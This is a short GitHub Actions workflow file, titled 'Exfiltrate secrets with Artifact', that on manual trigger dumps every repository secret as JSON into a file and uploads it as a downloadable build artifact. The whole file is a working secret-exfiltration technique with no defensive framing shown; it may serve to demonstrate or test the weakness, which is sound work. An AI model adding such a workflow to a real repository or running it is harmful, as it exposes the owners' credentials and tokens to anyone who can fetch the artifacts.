name: Exfiltrate secrets with Artifact

on:
  workflow_dispatch:

jobs:
  build:
    runs-on: ubuntu-24.04
    steps:
      - run: |
          echo "$ALLMYSECRETS" > secrets.json
        shell: bash
        env:
          ALLMYSECRETS: ${{ toJSON(secrets) }}

      - name: Upload secrets
        uses: actions/upload-artifact@v4
        with:
          name: secrets
          path: secrets.json